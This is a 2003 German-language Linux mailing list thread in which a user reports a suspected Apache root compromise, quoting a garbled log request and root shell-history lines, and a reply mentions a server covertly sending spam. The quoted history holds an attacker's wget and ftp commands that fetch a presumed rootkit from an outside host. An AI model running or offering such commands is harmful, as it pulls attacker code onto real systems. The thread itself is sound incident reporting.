Apache Bug?
Michael Schneider | MM-ITconsulting
michael.schneider at mm-itconsulting.com
Wed May 28 14:11:35 CEST 2003
On Wed, 28 May 2003 14:05:49 +0200, Markus Wigge wrote
> Tag,
>
> gibt es einen neuen Apache-Bug der root-Exploits ermöglicht?
> Ein Bekannter hat folgende Einträge im Log gefunden:
>
> a.b.c.d - - [26/May/2003:20:06:31 +0200] "T¡¬ôG^~Fgí±D1Mj×}äù<G<"
> 501 -
>
> IP mal aus Datenschutzgründen geändert...
>
> Er benutzt zur Zeit aktuelle Releases und hat ähnliche Zeilen auf
> mehreren Rechnern gefunden und in der .bash_history von root
> ungefähr folgende Zeilen die auf die Installation eines Root-Kit hindeuten:
> wget jhony.home.ro/aha
> ftp ftp.home.ro
>
> Evtl. ist auch ein anderer Dienst der Einstiegspunkt, z. Zt. können
> wir das nicht genau ermitteln.
>
> Hat jemand ähnliches gesichtet? Neuer Wurm im Umlauf o.ä.?
>
> bye
> Markus
>
> --
> Linux mailing list Linux at lug-owl.de
> subscribe/unsubscribe: http://lug-owl.de/cgi-bin/mailman/listinfo/linux
> Hinweise zur Nutzung: http://www.lug-owl.de/Mailingliste/hints.epo
Sehr interessant,
habe eine andere Sache,
wir spammen über eine SUN aber in den Logs von Sendmail ist nichts zu sehen,
trotzdem habe ich einige Verbindungen per smtp auf andere Adressen....
mfg
--
Michael Schneider
More information about the Linux
mailing list